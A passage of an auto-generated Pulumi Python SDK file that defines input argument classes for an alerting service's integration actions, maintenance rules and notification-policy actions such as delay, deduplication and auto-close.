def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="alertActions")
def alert_actions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "alert_actions")
@alert_actions.setter
def alert_actions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "alert_actions", value)
@property
@pulumi.getter
def alias(self) -> Optional[pulumi.Input[str]]:
"""
An identifier that is used for alert deduplication. Default: `{{alias}}`.
"""
return pulumi.get(self, "alias")
@alias.setter
def alias(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "alias", value)
@property
@pulumi.getter(name="appendAttachments")
def append_attachments(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "append_attachments")
@append_attachments.setter
def append_attachments(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "append_attachments", value)
@property
@pulumi.getter(name="customPriority")
def custom_priority(self) -> Optional[pulumi.Input[str]]:
"""
Custom alert priority. e.g. ``{{message.substring(0,2)}}``
"""
return pulumi.get(self, "custom_priority")
@custom_priority.setter
def custom_priority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_priority", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Detailed description of the alert, anything that may not have fit in the `message` field.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def entity(self) -> Optional[pulumi.Input[str]]:
"""
The entity the alert is related to.
"""
return pulumi.get(self, "entity")
@entity.setter
def entity(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "entity", value)
@property
@pulumi.getter(name="extraProperties")
def extra_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Set of user defined properties specified as a map.
"""
return pulumi.get(self, "extra_properties")
@extra_properties.setter
def extra_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "extra_properties", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter(name="ignoreAlertActionsFromPayload")
def ignore_alert_actions_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_alert_actions_from_payload")
@ignore_alert_actions_from_payload.setter
def ignore_alert_actions_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_alert_actions_from_payload", value)
@property
@pulumi.getter(name="ignoreExtraPropertiesFromPayload")
def ignore_extra_properties_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_extra_properties_from_payload")
@ignore_extra_properties_from_payload.setter
def ignore_extra_properties_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_extra_properties_from_payload", value)
@property
@pulumi.getter(name="ignoreRespondersFromPayload")
def ignore_responders_from_payload(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the integration will ignore responders sent in request payloads.
"""
return pulumi.get(self, "ignore_responders_from_payload")
@ignore_responders_from_payload.setter
def ignore_responders_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_responders_from_payload", value)
@property
@pulumi.getter(name="ignoreTagsFromPayload")
def ignore_tags_from_payload(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "ignore_tags_from_payload")
@ignore_tags_from_payload.setter
def ignore_tags_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_tags_from_payload", value)
@property
@pulumi.getter(name="ignoreTeamsFromPayload")
def ignore_teams_from_payload(self) -> Optional[pulumi.Input[bool]]:
"""
If enabled, the integration will ignore teams sent in request payloads.
"""
return pulumi.get(self, "ignore_teams_from_payload")
@ignore_teams_from_payload.setter
def ignore_teams_from_payload(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ignore_teams_from_payload", value)
@property
@pulumi.getter
def message(self) -> Optional[pulumi.Input[str]]:
"""
Alert text limited to 130 characters.
"""
return pulumi.get(self, "message")
@message.setter
def message(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message", value)
@property
@pulumi.getter
def note(self) -> Optional[pulumi.Input[str]]:
"""
Additional alert action note.
"""
return pulumi.get(self, "note")
@note.setter
def note(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "note", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[str]]:
"""
Alert priority.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter
def responders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]]:
"""
User, schedule, teams or escalation names to calculate which users will receive notifications of the alert.
"""
return pulumi.get(self, "responders")
@responders.setter
def responders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateResponderArgs']]]]):
pulumi.set(self, "responders", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
User defined field to specify source of action.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Comma separated list of labels to be attached to the alert.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def user(self) -> Optional[pulumi.Input[str]]:
"""
Owner of the execution for integration action.
"""
return pulumi.get(self, "user")
@user.setter
def user(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "user", value)
@pulumi.input_type
class IntegrationActionCreateFilterArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionCreateFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionCreateFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class IntegrationActionCreateResponderArgs:
def __init__(__self__, *,
id: pulumi.Input[str],
type: pulumi.Input[str]):
"""
:param pulumi.Input[str] id: The id of the responder.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> pulumi.Input[str]:
"""
The id of the responder.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: pulumi.Input[str]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class IntegrationActionIgnoreArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
filters: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]] = None,
order: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] name: Name of the integration action.
:param pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]] filters: Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "name", name)
if filters is not None:
pulumi.set(__self__, "filters", filters)
if order is not None:
pulumi.set(__self__, "order", order)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Name of the integration action.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]]:
"""
Used to specify rules for matching alerts and the filter type. Please note that depending on the integration type the field names in the filter conditions are:
* For SNS integration: `actions`, `alias`, `entity`, `Message`, `recipients`, `responders`, `Subject`, `tags`, `teams`, `eventType`, `Timestamp`, `TopicArn`.
* For API integration: `message`, `alias`, `description`, `source`, `entity`, `tags`, `actions`, `details`, `extra-properties`, `recipients`, `teams`, `priority`, `eventType`.
* For Email integration: `from_address`, `from_name`, `conversationSubject`, `subject`
"""
return pulumi.get(self, "filters")
@filters.setter
def filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterArgs']]]]):
pulumi.set(self, "filters", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class IntegrationActionIgnoreFilterArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
conditions: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]] = None):
"""
:param pulumi.Input[str] type: The responder type - can be `escalation`, `team` or `user`.
"""
pulumi.set(__self__, "type", type)
if conditions is not None:
pulumi.set(__self__, "conditions", conditions)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
The responder type - can be `escalation`, `team` or `user`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def conditions(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]]:
return pulumi.get(self, "conditions")
@conditions.setter
def conditions(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['IntegrationActionIgnoreFilterConditionArgs']]]]):
pulumi.set(self, "conditions", value)
@pulumi.input_type
class IntegrationActionIgnoreFilterConditionArgs:
def __init__(__self__, *,
field: pulumi.Input[str],
operation: pulumi.Input[str],
expected_value: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
not_: Optional[pulumi.Input[bool]] = None,
order: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[int] order: Integer value that defines in which order the action will be performed. Default: `1`.
"""
pulumi.set(__self__, "field", field)
pulumi.set(__self__, "operation", operation)
if expected_value is not None:
pulumi.set(__self__, "expected_value", expected_value)
if key is not None:
pulumi.set(__self__, "key", key)
if not_ is not None:
pulumi.set(__self__, "not_", not_)
if order is not None:
pulumi.set(__self__, "order", order)
@property
@pulumi.getter
def field(self) -> pulumi.Input[str]:
return pulumi.get(self, "field")
@field.setter
def field(self, value: pulumi.Input[str]):
pulumi.set(self, "field", value)
@property
@pulumi.getter
def operation(self) -> pulumi.Input[str]:
return pulumi.get(self, "operation")
@operation.setter
def operation(self, value: pulumi.Input[str]):
pulumi.set(self, "operation", value)
@property
@pulumi.getter(name="expectedValue")
def expected_value(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "expected_value")
@expected_value.setter
def expected_value(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expected_value", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="not")
def not_(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "not_")
@not_.setter
def not_(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "not_", value)
@property
@pulumi.getter
def order(self) -> Optional[pulumi.Input[int]]:
"""
Integer value that defines in which order the action will be performed. Default: `1`.
"""
return pulumi.get(self, "order")
@order.setter
def order(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "order", value)
@pulumi.input_type
class MaintenanceRuleArgs:
def __init__(__self__, *,
entities: pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]],
state: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]] entities: This field represents the entity that maintenance will be applied. Entity field takes two mandatory fields as id and type.
:param pulumi.Input[str] state: State of rule that will be defined in maintenance and can take either enabled or disabled for policy type rules. This field has to be disabled for integration type entity rules.
"""
pulumi.set(__self__, "entities", entities)
if state is not None:
pulumi.set(__self__, "state", state)
@property
@pulumi.getter
def entities(self) -> pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]]:
"""
This field represents the entity that maintenance will be applied. Entity field takes two mandatory fields as id and type.
"""
return pulumi.get(self, "entities")
@entities.setter
def entities(self, value: pulumi.Input[Sequence[pulumi.Input['MaintenanceRuleEntityArgs']]]):
pulumi.set(self, "entities", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
State of rule that will be defined in maintenance and can take either enabled or disabled for policy type rules. This field has to be disabled for integration type entity rules.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@pulumi.input_type
class MaintenanceRuleEntityArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] id: The id of the entity that maintenance will be applied.
:param pulumi.Input[str] type: This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
The id of the entity that maintenance will be applied.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class MaintenanceTimeArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
end_date: Optional[pulumi.Input[str]] = None,
start_date: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] type: This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
:param pulumi.Input[str] end_date: This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
:param pulumi.Input[str] start_date: This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
"""
pulumi.set(__self__, "type", type)
if end_date is not None:
pulumi.set(__self__, "end_date", end_date)
if start_date is not None:
pulumi.set(__self__, "start_date", start_date)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
This parameter defines when the maintenance will be active. It can take one of for-5-minutes, for-30-minutes, for-1-hour, indefinitely or schedule.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="endDate")
def end_date(self) -> Optional[pulumi.Input[str]]:
"""
This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
"""
return pulumi.get(self, "end_date")
@end_date.setter
def end_date(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_date", value)
@property
@pulumi.getter(name="startDate")
def start_date(self) -> Optional[pulumi.Input[str]]:
"""
This parameter takes a date format as (yyyy-MM-dd'T'HH:mm:ssZ) (e.g. 2019-06-11T08:00:00+02:00).
"""
return pulumi.get(self, "start_date")
@start_date.setter
def start_date(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_date", value)
@pulumi.input_type
class NotificationPolicyAutoCloseActionArgs:
def __init__(__self__, *,
durations: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]):
"""
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
pulumi.set(__self__, "durations", durations)
@property
@pulumi.getter
def durations(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]:
"""
Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
return pulumi.get(self, "durations")
@durations.setter
def durations(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoCloseActionDurationArgs']]]):
pulumi.set(self, "durations", value)
@pulumi.input_type
class NotificationPolicyAutoCloseActionDurationArgs:
def __init__(__self__, *,
time_amount: pulumi.Input[int],
time_unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
:param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
pulumi.set(__self__, "time_amount", time_amount)
if time_unit is not None:
pulumi.set(__self__, "time_unit", time_unit)
@property
@pulumi.getter(name="timeAmount")
def time_amount(self) -> pulumi.Input[int]:
"""
A amount of time in `time_units`. This is a integer attribute.
"""
return pulumi.get(self, "time_amount")
@time_amount.setter
def time_amount(self, value: pulumi.Input[int]):
pulumi.set(self, "time_amount", value)
@property
@pulumi.getter(name="timeUnit")
def time_unit(self) -> Optional[pulumi.Input[str]]:
"""
Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
return pulumi.get(self, "time_unit")
@time_unit.setter
def time_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyAutoRestartActionArgs:
def __init__(__self__, *,
durations: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]],
max_repeat_count: pulumi.Input[int]):
"""
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
:param pulumi.Input[int] max_repeat_count: How many times to repeat. This is a integer attribute.
"""
pulumi.set(__self__, "durations", durations)
pulumi.set(__self__, "max_repeat_count", max_repeat_count)
@property
@pulumi.getter
def durations(self) -> pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]]:
"""
Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
return pulumi.get(self, "durations")
@durations.setter
def durations(self, value: pulumi.Input[Sequence[pulumi.Input['NotificationPolicyAutoRestartActionDurationArgs']]]):
pulumi.set(self, "durations", value)
@property
@pulumi.getter(name="maxRepeatCount")
def max_repeat_count(self) -> pulumi.Input[int]:
"""
How many times to repeat. This is a integer attribute.
"""
return pulumi.get(self, "max_repeat_count")
@max_repeat_count.setter
def max_repeat_count(self, value: pulumi.Input[int]):
pulumi.set(self, "max_repeat_count", value)
@pulumi.input_type
class NotificationPolicyAutoRestartActionDurationArgs:
def __init__(__self__, *,
time_amount: pulumi.Input[int],
time_unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
:param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
pulumi.set(__self__, "time_amount", time_amount)
if time_unit is not None:
pulumi.set(__self__, "time_unit", time_unit)
@property
@pulumi.getter(name="timeAmount")
def time_amount(self) -> pulumi.Input[int]:
"""
A amount of time in `time_units`. This is a integer attribute.
"""
return pulumi.get(self, "time_amount")
@time_amount.setter
def time_amount(self, value: pulumi.Input[int]):
pulumi.set(self, "time_amount", value)
@property
@pulumi.getter(name="timeUnit")
def time_unit(self) -> Optional[pulumi.Input[str]]:
"""
Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
return pulumi.get(self, "time_unit")
@time_unit.setter
def time_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyDeDuplicationActionArgs:
def __init__(__self__, *,
count: pulumi.Input[int],
de_duplication_action_type: pulumi.Input[str],
durations: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]] = None):
"""
:param pulumi.Input[int] count: - Count
:param pulumi.Input[str] de_duplication_action_type: Deduplication type. Possible values are: "value-based", "frequency-based"
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
pulumi.set(__self__, "count", count)
pulumi.set(__self__, "de_duplication_action_type", de_duplication_action_type)
if durations is not None:
pulumi.set(__self__, "durations", durations)
@property
@pulumi.getter
def count(self) -> pulumi.Input[int]:
"""
- Count
"""
return pulumi.get(self, "count")
@count.setter
def count(self, value: pulumi.Input[int]):
pulumi.set(self, "count", value)
@property
@pulumi.getter(name="deDuplicationActionType")
def de_duplication_action_type(self) -> pulumi.Input[str]:
"""
Deduplication type. Possible values are: "value-based", "frequency-based"
"""
return pulumi.get(self, "de_duplication_action_type")
@de_duplication_action_type.setter
def de_duplication_action_type(self, value: pulumi.Input[str]):
pulumi.set(self, "de_duplication_action_type", value)
@property
@pulumi.getter
def durations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]]:
"""
Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
return pulumi.get(self, "durations")
@durations.setter
def durations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDeDuplicationActionDurationArgs']]]]):
pulumi.set(self, "durations", value)
@pulumi.input_type
class NotificationPolicyDeDuplicationActionDurationArgs:
def __init__(__self__, *,
time_amount: pulumi.Input[int],
time_unit: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] time_amount: A amount of time in `time_units`. This is a integer attribute.
:param pulumi.Input[str] time_unit: Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
pulumi.set(__self__, "time_amount", time_amount)
if time_unit is not None:
pulumi.set(__self__, "time_unit", time_unit)
@property
@pulumi.getter(name="timeAmount")
def time_amount(self) -> pulumi.Input[int]:
"""
A amount of time in `time_units`. This is a integer attribute.
"""
return pulumi.get(self, "time_amount")
@time_amount.setter
def time_amount(self, value: pulumi.Input[int]):
pulumi.set(self, "time_amount", value)
@property
@pulumi.getter(name="timeUnit")
def time_unit(self) -> Optional[pulumi.Input[str]]:
"""
Valid time units are: `minutes`, `hours`, `days`. Default: `minutes`
"""
return pulumi.get(self, "time_unit")
@time_unit.setter
def time_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_unit", value)
@pulumi.input_type
class NotificationPolicyDelayActionArgs:
def __init__(__self__, *,
delay_option: pulumi.Input[str],
durations: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]] = None,
until_hour: Optional[pulumi.Input[int]] = None,
until_minute: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] delay_option: Defines until what day to delay or for what duration. Possible values are: `for-duration`, `next-time`, `next-weekday`, `next-monday`, `next-tuesday`, `next-wednesday`, `next-thursday`, `next-friday`, `next-saturday`, `next-sunday`
:param pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]] durations: Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
:param pulumi.Input[int] until_hour: Until what hour notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
:param pulumi.Input[int] until_minute: Until what minute on `until_hour` notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
"""
pulumi.set(__self__, "delay_option", delay_option)
if durations is not None:
pulumi.set(__self__, "durations", durations)
if until_hour is not None:
pulumi.set(__self__, "until_hour", until_hour)
if until_minute is not None:
pulumi.set(__self__, "until_minute", until_minute)
@property
@pulumi.getter(name="delayOption")
def delay_option(self) -> pulumi.Input[str]:
"""
Defines until what day to delay or for what duration. Possible values are: `for-duration`, `next-time`, `next-weekday`, `next-monday`, `next-tuesday`, `next-wednesday`, `next-thursday`, `next-friday`, `next-saturday`, `next-sunday`
"""
return pulumi.get(self, "delay_option")
@delay_option.setter
def delay_option(self, value: pulumi.Input[str]):
pulumi.set(self, "delay_option", value)
@property
@pulumi.getter
def durations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]]:
"""
Duration of this action. If `delay_option` = `for-duration` this has to be set. This is a block, structure is documented below.
"""
return pulumi.get(self, "durations")
@durations.setter
def durations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NotificationPolicyDelayActionDurationArgs']]]]):
pulumi.set(self, "durations", value)
@property
@pulumi.getter(name="untilHour")
def until_hour(self) -> Optional[pulumi.Input[int]]:
"""
Until what hour notifications will be delayed. If `delay_option` is set to antyhing else then `for-duration` this has to be set.
"""
return pulumi.get(self, "until_hour")
@until_hour.setter
def until_hour(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "until_hour", value)
@property
@pulumi.getter(name="untilMinute")
def until_minute(self) -> Optional[pulumi.Input[int]]:
"""
